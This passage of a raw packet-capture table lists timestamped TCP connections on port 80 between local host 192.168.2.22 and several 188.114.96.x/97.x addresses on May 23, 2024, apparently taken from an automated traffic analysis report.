                      May 23, 2024 20:18:04.174877882 CEST4919180192.168.2.22188.114.96.3
                      May 23, 2024 20:18:04.176230907 CEST4919180192.168.2.22188.114.96.3
                      May 23, 2024 20:18:04.231723070 CEST8049191188.114.96.3192.168.2.22
                      May 23, 2024 20:18:04.232033014 CEST4919180192.168.2.22188.114.96.3
                      May 23, 2024 20:18:04.237247944 CEST8049191188.114.96.3192.168.2.22
                      May 23, 2024 20:18:05.011420012 CEST8049191188.114.96.3192.168.2.22
                      May 23, 2024 20:18:05.011512995 CEST4919180192.168.2.22188.114.96.3
                      May 23, 2024 20:18:05.016175032 CEST8049191188.114.96.3192.168.2.22
                      May 23, 2024 20:18:05.016252041 CEST4919180192.168.2.22188.114.96.3
                      May 23, 2024 20:18:05.063561916 CEST8049191188.114.96.3192.168.2.22
                      May 23, 2024 20:18:06.036950111 CEST4919280192.168.2.22188.114.97.3
                      May 23, 2024 20:18:06.044177055 CEST8049192188.114.97.3192.168.2.22
                      May 23, 2024 20:18:06.044223070 CEST4919280192.168.2.22188.114.97.3
                      May 23, 2024 20:18:06.045591116 CEST4919280192.168.2.22188.114.97.3
                      May 23, 2024 20:18:06.103562117 CEST8049192188.114.97.3192.168.2.22
                      May 23, 2024 20:18:06.103692055 CEST4919280192.168.2.22188.114.97.3
                      May 23, 2024 20:18:06.108910084 CEST8049192188.114.97.3192.168.2.22
                      May 23, 2024 20:18:06.911864042 CEST8049192188.114.97.3192.168.2.22
                      May 23, 2024 20:18:06.913633108 CEST4919280192.168.2.22188.114.97.3
                      May 23, 2024 20:18:06.916771889 CEST8049192188.114.97.3192.168.2.22
                      May 23, 2024 20:18:06.916832924 CEST4919280192.168.2.22188.114.97.3
                      May 23, 2024 20:18:06.967356920 CEST8049192188.114.97.3192.168.2.22
                      May 23, 2024 20:18:07.077646017 CEST4919380192.168.2.22188.114.97.3
                      May 23, 2024 20:18:07.082768917 CEST8049193188.114.97.3192.168.2.22
                      May 23, 2024 20:18:07.082839012 CEST4919380192.168.2.22188.114.97.3
                      May 23, 2024 20:18:07.107765913 CEST4919380192.168.2.22188.114.97.3
                      May 23, 2024 20:18:07.135510921 CEST8049193188.114.97.3192.168.2.22
                      May 23, 2024 20:18:07.135699987 CEST4919380192.168.2.22188.114.97.3
                      May 23, 2024 20:18:07.143167019 CEST8049193188.114.97.3192.168.2.22
                      May 23, 2024 20:18:07.833966970 CEST8049193188.114.97.3192.168.2.22
                      May 23, 2024 20:18:07.834264994 CEST4919380192.168.2.22188.114.97.3
                      May 23, 2024 20:18:07.838851929 CEST8049193188.114.97.3192.168.2.22
                      May 23, 2024 20:18:07.838963985 CEST4919380192.168.2.22188.114.97.3
                      May 23, 2024 20:18:07.887854099 CEST8049193188.114.97.3192.168.2.22
                      May 23, 2024 20:18:07.983136892 CEST4919480192.168.2.22188.114.96.3
                      May 23, 2024 20:18:07.988240004 CEST8049194188.114.96.3192.168.2.22
                      May 23, 2024 20:18:07.988315105 CEST4919480192.168.2.22188.114.96.3
                      May 23, 2024 20:18:07.989686012 CEST4919480192.168.2.22188.114.96.3
                      May 23, 2024 20:18:08.039583921 CEST8049194188.114.96.3192.168.2.22
                      May 23, 2024 20:18:08.039657116 CEST4919480192.168.2.22188.114.96.3
                      May 23, 2024 20:18:08.044790030 CEST8049194188.114.96.3192.168.2.22
                      May 23, 2024 20:18:08.765249968 CEST8049194188.114.96.3192.168.2.22
                      May 23, 2024 20:18:08.765441895 CEST4919480192.168.2.22188.114.96.3
                      May 23, 2024 20:18:08.769992113 CEST8049194188.114.96.3192.168.2.22
                      May 23, 2024 20:18:08.770059109 CEST4919480192.168.2.22188.114.96.3
                      May 23, 2024 20:18:08.815469980 CEST8049194188.114.96.3192.168.2.22
                      May 23, 2024 20:18:08.941648960 CEST4919580192.168.2.22188.114.96.3
                      May 23, 2024 20:18:08.946636915 CEST8049195188.114.96.3192.168.2.22
                      May 23, 2024 20:18:08.946713924 CEST4919580192.168.2.22188.114.96.3
                      May 23, 2024 20:18:08.948107004 CEST4919580192.168.2.22188.114.96.3
                      May 23, 2024 20:18:09.004625082 CEST8049195188.114.96.3192.168.2.22
                      May 23, 2024 20:18:09.004693985 CEST4919580192.168.2.22188.114.96.3
                      May 23, 2024 20:18:09.009738922 CEST8049195188.114.96.3192.168.2.22
                      May 23, 2024 20:18:09.690977097 CEST8049195188.114.96.3192.168.2.22
                      May 23, 2024 20:18:09.691113949 CEST4919580192.168.2.22188.114.96.3
                      May 23, 2024 20:18:09.695756912 CEST8049195188.114.96.3192.168.2.22
                      May 23, 2024 20:18:09.695915937 CEST4919580192.168.2.22188.114.96.3
                      May 23, 2024 20:18:09.747828007 CEST8049195188.114.96.3192.168.2.22
                      May 23, 2024 20:18:09.852881908 CEST4919680192.168.2.22188.114.97.3
                      May 23, 2024 20:18:09.859344959 CEST8049196188.114.97.3192.168.2.22
                      May 23, 2024 20:18:09.859416008 CEST4919680192.168.2.22188.114.97.3
                      May 23, 2024 20:18:09.860809088 CEST4919680192.168.2.22188.114.97.3
                      May 23, 2024 20:18:09.911744118 CEST8049196188.114.97.3192.168.2.22
                      May 23, 2024 20:18:09.911942959 CEST4919680192.168.2.22188.114.97.3
                      May 23, 2024 20:18:09.916882992 CEST8049196188.114.97.3192.168.2.22
                      May 23, 2024 20:18:10.520375967 CEST8049196188.114.97.3192.168.2.22
                      May 23, 2024 20:18:10.520497084 CEST4919680192.168.2.22188.114.97.3
                      May 23, 2024 20:18:10.525280952 CEST8049196188.114.97.3192.168.2.22
                      May 23, 2024 20:18:10.525347948 CEST4919680192.168.2.22188.114.97.3
                      May 23, 2024 20:18:10.574280024 CEST8049196188.114.97.3192.168.2.22
                      May 23, 2024 20:18:10.672262907 CEST4919780192.168.2.22188.114.96.3
                      May 23, 2024 20:18:10.677340984 CEST8049197188.114.96.3192.168.2.22
                      May 23, 2024 20:18:10.677427053 CEST4919780192.168.2.22188.114.96.3
                      May 23, 2024 20:18:10.679780960 CEST4919780192.168.2.22188.114.96.3
                      May 23, 2024 20:18:10.731678009 CEST8049197188.114.96.3192.168.2.22
                      May 23, 2024 20:18:10.732007027 CEST4919780192.168.2.22188.114.96.3
                      May 23, 2024 20:18:10.737154007 CEST8049197188.114.96.3192.168.2.22
                      May 23, 2024 20:18:11.463794947 CEST8049197188.114.96.3192.168.2.22
                      May 23, 2024 20:18:11.468555927 CEST8049197188.114.96.3192.168.2.22
                      May 23, 2024 20:18:11.468710899 CEST4919780192.168.2.22188.114.96.3
                      May 23, 2024 20:18:11.562999010 CEST4919780192.168.2.22188.114.96.3
                      May 23, 2024 20:18:11.568592072 CEST8049197188.114.96.3192.168.2.22
                      May 23, 2024 20:18:11.707807064 CEST4919880192.168.2.22188.114.96.3
                      May 23, 2024 20:18:11.712827921 CEST8049198188.114.96.3192.168.2.22
                      May 23, 2024 20:18:11.712877989 CEST4919880192.168.2.22188.114.96.3
                      May 23, 2024 20:18:11.714251041 CEST4919880192.168.2.22188.114.96.3
                      May 23, 2024 20:18:11.765427113 CEST8049198188.114.96.3192.168.2.22
                      May 23, 2024 20:18:11.765513897 CEST4919880192.168.2.22188.114.96.3
                      May 23, 2024 20:18:11.773397923 CEST8049198188.114.96.3192.168.2.22
                      May 23, 2024 20:18:12.461520910 CEST8049198188.114.96.3192.168.2.22
                      May 23, 2024 20:18:12.462222099 CEST4919880192.168.2.22188.114.96.3
                      May 23, 2024 20:18:12.466284037 CEST8049198188.114.96.3192.168.2.22
                      May 23, 2024 20:18:12.466363907 CEST4919880192.168.2.22188.114.96.3
                      May 23, 2024 20:18:12.511349916 CEST8049198188.114.96.3192.168.2.22
                      May 23, 2024 20:18:16.264302015 CEST4919980192.168.2.22188.114.96.3
                      May 23, 2024 20:18:16.269280910 CEST8049199188.114.96.3192.168.2.22
                      May 23, 2024 20:18:16.269365072 CEST4919980192.168.2.22188.114.96.3
                      May 23, 2024 20:18:16.270962000 CEST4919980192.168.2.22188.114.96.3
                      May 23, 2024 20:18:16.327801943 CEST8049199188.114.96.3192.168.2.22
                      May 23, 2024 20:18:16.327889919 CEST4919980192.168.2.22188.114.96.3
                      May 23, 2024 20:18:16.332849026 CEST8049199188.114.96.3192.168.2.22
                      May 23, 2024 20:18:17.009301901 CEST8049199188.114.96.3192.168.2.22
                      May 23, 2024 20:18:17.009463072 CEST4919980192.168.2.22188.114.96.3
                      May 23, 2024 20:18:17.013881922 CEST8049199188.114.96.3192.168.2.22
                      May 23, 2024 20:18:17.013959885 CEST4919980192.168.2.22188.114.96.3
                      May 23, 2024 20:18:17.059484005 CEST8049199188.114.96.3192.168.2.22
                      May 23, 2024 20:18:17.149787903 CEST4920080192.168.2.22188.114.96.3
                      May 23, 2024 20:18:17.154689074 CEST8049200188.114.96.3192.168.2.22
                      May 23, 2024 20:18:17.154762030 CEST4920080192.168.2.22188.114.96.3
                      May 23, 2024 20:18:17.156368017 CEST4920080192.168.2.22188.114.96.3
                      May 23, 2024 20:18:17.221580029 CEST8049200188.114.96.3192.168.2.22
                      May 23, 2024 20:18:17.221688032 CEST4920080192.168.2.22188.114.96.3
                      May 23, 2024 20:18:17.231185913 CEST8049200188.114.96.3192.168.2.22
                      May 23, 2024 20:18:17.923675060 CEST8049200188.114.96.3192.168.2.22
                      May 23, 2024 20:18:17.923909903 CEST4920080192.168.2.22188.114.96.3
                      May 23, 2024 20:18:17.928392887 CEST8049200188.114.96.3192.168.2.22
                      May 23, 2024 20:18:17.928472996 CEST4920080192.168.2.22188.114.96.3
                      May 23, 2024 20:18:17.979387045 CEST8049200188.114.96.3192.168.2.22
                      May 23, 2024 20:18:18.070599079 CEST4920180192.168.2.22188.114.97.3
                      May 23, 2024 20:18:18.078079939 CEST8049201188.114.97.3192.168.2.22
                      May 23, 2024 20:18:18.078155041 CEST4920180192.168.2.22188.114.97.3
                      May 23, 2024 20:18:18.079750061 CEST4920180192.168.2.22188.114.97.3
                      May 23, 2024 20:18:18.131536961 CEST8049201188.114.97.3192.168.2.22
                      May 23, 2024 20:18:18.131640911 CEST4920180192.168.2.22188.114.97.3
                      May 23, 2024 20:18:18.136893034 CEST8049201188.114.97.3192.168.2.22
                      May 23, 2024 20:18:18.808876038 CEST8049201188.114.97.3192.168.2.22
                      May 23, 2024 20:18:18.809071064 CEST4920180192.168.2.22188.114.97.3
                      May 23, 2024 20:18:18.813684940 CEST8049201188.114.97.3192.168.2.22
                      May 23, 2024 20:18:18.813749075 CEST4920180192.168.2.22188.114.97.3
                      May 23, 2024 20:18:18.859734058 CEST8049201188.114.97.3192.168.2.22
                      May 23, 2024 20:18:18.964879990 CEST4920280192.168.2.22188.114.96.9
                      May 23, 2024 20:18:18.974132061 CEST8049202188.114.96.9192.168.2.22
                      May 23, 2024 20:18:18.974194050 CEST4920280192.168.2.22188.114.96.9
                      May 23, 2024 20:18:18.976087093 CEST4920280192.168.2.22188.114.96.9
                      May 23, 2024 20:18:19.027650118 CEST8049202188.114.96.9192.168.2.22
                      May 23, 2024 20:18:19.027724028 CEST4920280192.168.2.22188.114.96.9
                      May 23, 2024 20:18:19.032886028 CEST8049202188.114.96.9192.168.2.22
                      May 23, 2024 20:18:19.808820963 CEST8049202188.114.96.9192.168.2.22
                      May 23, 2024 20:18:19.808960915 CEST4920280192.168.2.22188.114.96.9
                      May 23, 2024 20:18:19.813631058 CEST8049202188.114.96.9192.168.2.22
                      May 23, 2024 20:18:19.813702106 CEST4920280192.168.2.22188.114.96.9
                      May 23, 2024 20:18:19.862462997 CEST8049202188.114.96.9192.168.2.22
                      May 23, 2024 20:18:19.980058908 CEST4920380192.168.2.22188.114.96.3
                      May 23, 2024 20:18:19.986592054 CEST8049203188.114.96.3192.168.2.22
                      May 23, 2024 20:18:19.986677885 CEST4920380192.168.2.22188.114.96.3
                      May 23, 2024 20:18:19.988815069 CEST4920380192.168.2.22188.114.96.3
                      May 23, 2024 20:18:20.039613008 CEST8049203188.114.96.3192.168.2.22
                      May 23, 2024 20:18:20.039690018 CEST4920380192.168.2.22188.114.96.3
                      May 23, 2024 20:18:20.046281099 CEST8049203188.114.96.3192.168.2.22
                      May 23, 2024 20:18:20.721458912 CEST8049203188.114.96.3192.168.2.22
                      May 23, 2024 20:18:20.721590042 CEST4920380192.168.2.22188.114.96.3
                      May 23, 2024 20:18:20.741492033 CEST8049203188.114.96.3192.168.2.22
                      May 23, 2024 20:18:20.741566896 CEST4920380192.168.2.22188.114.96.3
                      May 23, 2024 20:18:20.783457041 CEST8049203188.114.96.3192.168.2.22
                      May 23, 2024 20:18:20.875890017 CEST4920480192.168.2.22188.114.96.9
                      May 23, 2024 20:18:20.880871058 CEST8049204188.114.96.9192.168.2.22
                      May 23, 2024 20:18:20.880923986 CEST4920480192.168.2.22188.114.96.9
                      May 23, 2024 20:18:20.882874012 CEST4920480192.168.2.22188.114.96.9
                      May 23, 2024 20:18:20.935703039 CEST8049204188.114.96.9192.168.2.22
                      May 23, 2024 20:18:20.935875893 CEST4920480192.168.2.22188.114.96.9
                      May 23, 2024 20:18:20.940905094 CEST8049204188.114.96.9192.168.2.22
                      May 23, 2024 20:18:21.692867041 CEST8049204188.114.96.9192.168.2.22
                      May 23, 2024 20:18:21.693047047 CEST4920480192.168.2.22188.114.96.9
                      May 23, 2024 20:18:21.699018955 CEST8049204188.114.96.9192.168.2.22
                      May 23, 2024 20:18:21.699079990 CEST4920480192.168.2.22188.114.96.9
                      May 23, 2024 20:18:21.751240969 CEST8049204188.114.96.9192.168.2.22
                      May 23, 2024 20:18:21.829606056 CEST4920580192.168.2.22188.114.96.3
                      May 23, 2024 20:18:21.834616899 CEST8049205188.114.96.3192.168.2.22
                      May 23, 2024 20:18:21.834672928 CEST4920580192.168.2.22188.114.96.3
                      May 23, 2024 20:18:21.836224079 CEST4920580192.168.2.22188.114.96.3
                      May 23, 2024 20:18:21.888178110 CEST8049205188.114.96.3192.168.2.22
                      May 23, 2024 20:18:21.888267994 CEST4920580192.168.2.22188.114.96.3
                      May 23, 2024 20:18:21.893537998 CEST8049205188.114.96.3192.168.2.22
                      May 23, 2024 20:18:22.626806021 CEST8049205188.114.96.3192.168.2.22
                      May 23, 2024 20:18:22.627039909 CEST4920580192.168.2.22188.114.96.3
                      May 23, 2024 20:18:22.631593943 CEST8049205188.114.96.3192.168.2.22
                      May 23, 2024 20:18:22.631706953 CEST4920580192.168.2.22188.114.96.3
                      May 23, 2024 20:18:22.684015036 CEST8049205188.114.96.3192.168.2.22
                      May 23, 2024 20:18:22.765367985 CEST4920680192.168.2.22188.114.96.3
                      May 23, 2024 20:18:22.770344019 CEST8049206188.114.96.3192.168.2.22
                      May 23, 2024 20:18:22.770414114 CEST4920680192.168.2.22188.114.96.3
                      May 23, 2024 20:18:22.772747993 CEST4920680192.168.2.22188.114.96.3
                      May 23, 2024 20:18:22.823534966 CEST8049206188.114.96.3192.168.2.22
                      May 23, 2024 20:18:22.823609114 CEST4920680192.168.2.22188.114.96.3
                      May 23, 2024 20:18:22.828682899 CEST8049206188.114.96.3192.168.2.22
                      May 23, 2024 20:18:23.512218952 CEST8049206188.114.96.3192.168.2.22
                      May 23, 2024 20:18:23.512377977 CEST4920680192.168.2.22188.114.96.3
                      May 23, 2024 20:18:23.518044949 CEST8049206188.114.96.3192.168.2.22
                      May 23, 2024 20:18:23.518137932 CEST4920680192.168.2.22188.114.96.3
                      May 23, 2024 20:18:23.564105034 CEST8049206188.114.96.3192.168.2.22
                      May 23, 2024 20:18:23.666809082 CEST4920780192.168.2.22188.114.96.3
                      May 23, 2024 20:18:23.672270060 CEST8049207188.114.96.3192.168.2.22
                      May 23, 2024 20:18:23.672561884 CEST4920780192.168.2.22188.114.96.3
                      May 23, 2024 20:18:23.674890041 CEST4920780192.168.2.22188.114.96.3
                      May 23, 2024 20:18:23.724412918 CEST8049207188.114.96.3192.168.2.22
                      May 23, 2024 20:18:23.724689007 CEST4920780192.168.2.22188.114.96.3
                      May 23, 2024 20:18:23.730101109 CEST8049207188.114.96.3192.168.2.22
                      May 23, 2024 20:18:24.406585932 CEST8049207188.114.96.3192.168.2.22
                      May 23, 2024 20:18:24.406709909 CEST4920780192.168.2.22188.114.96.3
                      May 23, 2024 20:18:24.411914110 CEST8049207188.114.96.3192.168.2.22
                      May 23, 2024 20:18:24.411984921 CEST4920780192.168.2.22188.114.96.3
                      May 23, 2024 20:18:24.466341019 CEST8049207188.114.96.3192.168.2.22
                      May 23, 2024 20:18:24.558347940 CEST4920880192.168.2.22188.114.96.3
                      May 23, 2024 20:18:24.563484907 CEST8049208188.114.96.3192.168.2.22
                      May 23, 2024 20:18:24.563580990 CEST4920880192.168.2.22188.114.96.3
                      May 23, 2024 20:18:24.566045046 CEST4920880192.168.2.22188.114.96.3
                      May 23, 2024 20:18:24.619518042 CEST8049208188.114.96.3192.168.2.22
                      May 23, 2024 20:18:24.619584084 CEST4920880192.168.2.22188.114.96.3
                      May 23, 2024 20:18:24.624912024 CEST8049208188.114.96.3192.168.2.22
                      May 23, 2024 20:18:25.323944092 CEST8049208188.114.96.3192.168.2.22
                      May 23, 2024 20:18:25.324134111 CEST4920880192.168.2.22188.114.96.3
                      May 23, 2024 20:18:25.328653097 CEST8049208188.114.96.3192.168.2.22
                      May 23, 2024 20:18:25.328747988 CEST4920880192.168.2.22188.114.96.3
                      May 23, 2024 20:18:25.378937006 CEST8049208188.114.96.3192.168.2.22
                      May 23, 2024 20:18:25.477304935 CEST4920980192.168.2.22188.114.97.3
                      May 23, 2024 20:18:25.483161926 CEST8049209188.114.97.3192.168.2.22
                      May 23, 2024 20:18:25.483273983 CEST4920980192.168.2.22188.114.97.3
                      May 23, 2024 20:18:25.484709978 CEST4920980192.168.2.22188.114.97.3
                      May 23, 2024 20:18:25.540159941 CEST8049209188.114.97.3192.168.2.22
                      May 23, 2024 20:18:25.540275097 CEST4920980192.168.2.22188.114.97.3
                      May 23, 2024 20:18:25.550825119 CEST8049209188.114.97.3192.168.2.22
                      May 23, 2024 20:18:26.225308895 CEST8049209188.114.97.3192.168.2.22
                      May 23, 2024 20:18:26.225451946 CEST4920980192.168.2.22188.114.97.3
                      May 23, 2024 20:18:26.238154888 CEST8049209188.114.97.3192.168.2.22
                      May 23, 2024 20:18:26.238394976 CEST4920980192.168.2.22188.114.97.3
                      May 23, 2024 20:18:26.283432961 CEST8049209188.114.97.3192.168.2.22
                      May 23, 2024 20:18:26.588325977 CEST4921080192.168.2.22188.114.96.9
                      May 23, 2024 20:18:26.593250990 CEST8049210188.114.96.9192.168.2.22
                      May 23, 2024 20:18:26.593313932 CEST4921080192.168.2.22188.114.96.9
                      May 23, 2024 20:18:26.597771883 CEST4921080192.168.2.22188.114.96.9
                      May 23, 2024 20:18:26.644861937 CEST8049210188.114.96.9192.168.2.22
                      May 23, 2024 20:18:26.644923925 CEST4921080192.168.2.22188.114.96.9
                      May 23, 2024 20:18:26.650892019 CEST8049210188.114.96.9192.168.2.22
                      May 23, 2024 20:18:27.352135897 CEST8049210188.114.96.9192.168.2.22
                      May 23, 2024 20:18:27.352344990 CEST4921080192.168.2.22188.114.96.9
                      May 23, 2024 20:18:27.359999895 CEST8049210188.114.96.9192.168.2.22
                      May 23, 2024 20:18:27.360059023 CEST4921080192.168.2.22188.114.96.9
                      May 23, 2024 20:18:27.505734921 CEST4921180192.168.2.22188.114.97.3
                      May 23, 2024 20:18:27.511409998 CEST8049211188.114.97.3192.168.2.22
                      May 23, 2024 20:18:27.511713982 CEST4921180192.168.2.22188.114.97.3
                      May 23, 2024 20:18:27.512891054 CEST4921180192.168.2.22188.114.97.3
                      May 23, 2024 20:18:27.564291000 CEST8049211188.114.97.3192.168.2.22
                      May 23, 2024 20:18:27.564429045 CEST4921180192.168.2.22188.114.97.3
                      May 23, 2024 20:18:27.571541071 CEST8049211188.114.97.3192.168.2.22
                      May 23, 2024 20:18:28.221432924 CEST8049211188.114.97.3192.168.2.22
                      May 23, 2024 20:18:28.221582890 CEST4921180192.168.2.22188.114.97.3
                      May 23, 2024 20:18:28.226118088 CEST8049211188.114.97.3192.168.2.22
                      May 23, 2024 20:18:28.226295948 CEST4921180192.168.2.22188.114.97.3
                      May 23, 2024 20:18:28.271677017 CEST8049211188.114.97.3192.168.2.22
                      May 23, 2024 20:18:28.368727922 CEST4921280192.168.2.22188.114.96.9
                      May 23, 2024 20:18:28.374696970 CEST8049212188.114.96.9192.168.2.22
                      May 23, 2024 20:18:28.374763012 CEST4921280192.168.2.22188.114.96.9
                      May 23, 2024 20:18:28.376454115 CEST4921280192.168.2.22188.114.96.9
                      May 23, 2024 20:18:28.429728031 CEST8049212188.114.96.9192.168.2.22
                      May 23, 2024 20:18:28.429852962 CEST4921280192.168.2.22188.114.96.9
                      May 23, 2024 20:18:28.436306000 CEST8049212188.114.96.9192.168.2.22
                      May 23, 2024 20:18:29.124516010 CEST8049212188.114.96.9192.168.2.22
                      May 23, 2024 20:18:29.124638081 CEST4921280192.168.2.22188.114.96.9
                      May 23, 2024 20:18:29.129431963 CEST8049212188.114.96.9192.168.2.22
                      May 23, 2024 20:18:29.129502058 CEST4921280192.168.2.22188.114.96.9
                      May 23, 2024 20:18:29.176189899 CEST8049212188.114.96.9192.168.2.22
                      May 23, 2024 20:18:29.287446976 CEST4921380192.168.2.22188.114.96.3
                      May 23, 2024 20:18:29.292767048 CEST8049213188.114.96.3192.168.2.22
                      May 23, 2024 20:18:29.292850971 CEST4921380192.168.2.22188.114.96.3
                      May 23, 2024 20:18:29.294238091 CEST4921380192.168.2.22188.114.96.3
                      May 23, 2024 20:18:29.348107100 CEST8049213188.114.96.3192.168.2.22
                      May 23, 2024 20:18:29.348448992 CEST4921380192.168.2.22188.114.96.3
                      May 23, 2024 20:18:29.354367971 CEST8049213188.114.96.3192.168.2.22
                      May 23, 2024 20:18:29.934037924 CEST8049213188.114.96.3192.168.2.22
                      May 23, 2024 20:18:29.934144974 CEST4921380192.168.2.22188.114.96.3
                      May 23, 2024 20:18:29.939555883 CEST8049213188.114.96.3192.168.2.22
                      May 23, 2024 20:18:29.939665079 CEST4921380192.168.2.22188.114.96.3
                      May 23, 2024 20:18:29.991481066 CEST8049213188.114.96.3192.168.2.22
                      May 23, 2024 20:18:30.091880083 CEST4921480192.168.2.22188.114.96.9
                      May 23, 2024 20:18:30.096884966 CEST8049214188.114.96.9192.168.2.22
                      May 23, 2024 20:18:30.096961975 CEST4921480192.168.2.22188.114.96.9
                      May 23, 2024 20:18:30.098367929 CEST4921480192.168.2.22188.114.96.9
                      May 23, 2024 20:18:30.149241924 CEST8049214188.114.96.9192.168.2.22
                      May 23, 2024 20:18:30.149559975 CEST4921480192.168.2.22188.114.96.9
                      May 23, 2024 20:18:30.158974886 CEST8049214188.114.96.9192.168.2.22
                      May 23, 2024 20:18:30.812721968 CEST8049214188.114.96.9192.168.2.22
                      May 23, 2024 20:18:30.813029051 CEST4921480192.168.2.22188.114.96.9
                      May 23, 2024 20:18:30.817847967 CEST8049214188.114.96.9192.168.2.22
                      May 23, 2024 20:18:30.818218946 CEST4921480192.168.2.22188.114.96.9
                      May 23, 2024 20:18:30.863512039 CEST8049214188.114.96.9192.168.2.22
                      May 23, 2024 20:18:30.950469971 CEST4921580192.168.2.22188.114.97.3
                      May 23, 2024 20:18:30.955699921 CEST8049215188.114.97.3192.168.2.22
                      May 23, 2024 20:18:30.955755949 CEST4921580192.168.2.22188.114.97.3
                      May 23, 2024 20:18:30.957361937 CEST4921580192.168.2.22188.114.97.3
                      May 23, 2024 20:18:31.008302927 CEST8049215188.114.97.3192.168.2.22
                      May 23, 2024 20:18:31.008379936 CEST4921580192.168.2.22188.114.97.3
                      May 23, 2024 20:18:31.013396025 CEST8049215188.114.97.3192.168.2.22
                      May 23, 2024 20:18:31.553235054 CEST8049215188.114.97.3192.168.2.22
                      May 23, 2024 20:18:31.557898998 CEST8049215188.114.97.3192.168.2.22
                      May 23, 2024 20:18:31.557984114 CEST4921580192.168.2.22188.114.97.3
                      May 23, 2024 20:18:31.561707020 CEST4921580192.168.2.22188.114.97.3
                      May 23, 2024 20:18:31.616019011 CEST8049215188.114.97.3192.168.2.22
                      May 23, 2024 20:18:31.704751015 CEST4921680192.168.2.22188.114.97.3
                      May 23, 2024 20:18:31.710861921 CEST8049216188.114.97.3192.168.2.22
                      May 23, 2024 20:18:31.710928917 CEST4921680192.168.2.22188.114.97.3
                      May 23, 2024 20:18:31.712532043 CEST4921680192.168.2.22188.114.97.3
                      May 23, 2024 20:18:31.764050007 CEST8049216188.114.97.3192.168.2.22
                      May 23, 2024 20:18:31.764251947 CEST4921680192.168.2.22188.114.97.3
                      May 23, 2024 20:18:31.769304037 CEST8049216188.114.97.3192.168.2.22
                      May 23, 2024 20:18:32.421569109 CEST8049216188.114.97.3192.168.2.22
                      May 23, 2024 20:18:32.426429033 CEST8049216188.114.97.3192.168.2.22
                      May 23, 2024 20:18:32.428025961 CEST4921680192.168.2.22188.114.97.3
                      May 23, 2024 20:18:32.432585001 CEST4921680192.168.2.22188.114.97.3
                      May 23, 2024 20:18:32.482346058 CEST8049216188.114.97.3192.168.2.22
                      May 23, 2024 20:18:37.670437098 CEST4921780192.168.2.22188.114.96.3
                      May 23, 2024 20:18:37.675462008 CEST8049217188.114.96.3192.168.2.22
                      May 23, 2024 20:18:37.675513983 CEST4921780192.168.2.22188.114.96.3
                      May 23, 2024 20:18:37.677256107 CEST4921780192.168.2.22188.114.96.3
                      May 23, 2024 20:18:37.737257957 CEST8049217188.114.96.3192.168.2.22
                      May 23, 2024 20:18:37.737449884 CEST4921780192.168.2.22188.114.96.3
                      May 23, 2024 20:18:37.749797106 CEST8049217188.114.96.3192.168.2.22
                      May 23, 2024 20:18:38.405973911 CEST8049217188.114.96.3192.168.2.22
                      May 23, 2024 20:18:38.406135082 CEST4921780192.168.2.22188.114.96.3
                      May 23, 2024 20:18:38.412060976 CEST8049217188.114.96.3192.168.2.22
                      May 23, 2024 20:18:38.412137032 CEST4921780192.168.2.22188.114.96.3
                      May 23, 2024 20:18:38.462507963 CEST8049217188.114.96.3192.168.2.22
                      May 23, 2024 20:18:38.553268909 CEST4921880192.168.2.22188.114.97.9
                      May 23, 2024 20:18:38.558691025 CEST8049218188.114.97.9192.168.2.22
                      May 23, 2024 20:18:38.558867931 CEST4921880192.168.2.22188.114.97.9
                      May 23, 2024 20:18:38.560339928 CEST4921880192.168.2.22188.114.97.9
                      May 23, 2024 20:18:38.611499071 CEST8049218188.114.97.9192.168.2.22
                      May 23, 2024 20:18:38.611571074 CEST4921880192.168.2.22188.114.97.9
                      May 23, 2024 20:18:38.616566896 CEST8049218188.114.97.9192.168.2.22
                      May 23, 2024 20:18:39.223416090 CEST8049218188.114.97.9192.168.2.22
                      May 23, 2024 20:18:39.223552942 CEST4921880192.168.2.22188.114.97.9
                      May 23, 2024 20:18:39.228080034 CEST8049218188.114.97.9192.168.2.22
                      May 23, 2024 20:18:39.228141069 CEST4921880192.168.2.22188.114.97.9
                      May 23, 2024 20:18:39.279297113 CEST8049218188.114.97.9192.168.2.22
                      May 23, 2024 20:18:39.374656916 CEST4921980192.168.2.22188.114.97.3
                      May 23, 2024 20:18:39.379738092 CEST8049219188.114.97.3192.168.2.22
                      May 23, 2024 20:18:39.379828930 CEST4921980192.168.2.22188.114.97.3
                      May 23, 2024 20:18:39.381191015 CEST4921980192.168.2.22188.114.97.3
                      May 23, 2024 20:18:39.439763069 CEST8049219188.114.97.3192.168.2.22
                      May 23, 2024 20:18:39.439939022 CEST4921980192.168.2.22188.114.97.3
                      May 23, 2024 20:18:39.444869041 CEST8049219188.114.97.3192.168.2.22
                      May 23, 2024 20:18:40.118145943 CEST8049219188.114.97.3192.168.2.22
                      May 23, 2024 20:18:40.118309975 CEST4921980192.168.2.22188.114.97.3
                      May 23, 2024 20:18:40.122809887 CEST8049219188.114.97.3192.168.2.22
                      May 23, 2024 20:18:40.122873068 CEST4921980192.168.2.22188.114.97.3
                      May 23, 2024 20:18:40.175375938 CEST8049219188.114.97.3192.168.2.22
                      May 23, 2024 20:18:40.266922951 CEST4922080192.168.2.22188.114.97.9
                      May 23, 2024 20:18:40.272515059 CEST8049220188.114.97.9192.168.2.22
                      May 23, 2024 20:18:40.272617102 CEST4922080192.168.2.22188.114.97.9
                      May 23, 2024 20:18:40.275028944 CEST4922080192.168.2.22188.114.97.9
                      May 23, 2024 20:18:40.324906111 CEST8049220188.114.97.9192.168.2.22
                      May 23, 2024 20:18:40.324969053 CEST4922080192.168.2.22188.114.97.9
                      May 23, 2024 20:18:40.335352898 CEST8049220188.114.97.9192.168.2.22
                      May 23, 2024 20:18:41.062020063 CEST8049220188.114.97.9192.168.2.22
                      May 23, 2024 20:18:41.062396049 CEST4922080192.168.2.22188.114.97.9
                      May 23, 2024 20:18:41.067291021 CEST8049220188.114.97.9192.168.2.22
                      May 23, 2024 20:18:41.067363024 CEST4922080192.168.2.22188.114.97.9
                      May 23, 2024 20:18:41.115900040 CEST8049220188.114.97.9192.168.2.22
                      May 23, 2024 20:18:41.202528000 CEST4922180192.168.2.22188.114.97.3
                      May 23, 2024 20:18:41.208758116 CEST8049221188.114.97.3192.168.2.22
                      May 23, 2024 20:18:41.208885908 CEST4922180192.168.2.22188.114.97.3
                      May 23, 2024 20:18:41.210685968 CEST4922180192.168.2.22188.114.97.3
                      May 23, 2024 20:18:41.263386965 CEST8049221188.114.97.3192.168.2.22
                      May 23, 2024 20:18:41.263561964 CEST4922180192.168.2.22188.114.97.3
                      May 23, 2024 20:18:41.268692017 CEST8049221188.114.97.3192.168.2.22
                      May 23, 2024 20:18:41.825371027 CEST8049221188.114.97.3192.168.2.22
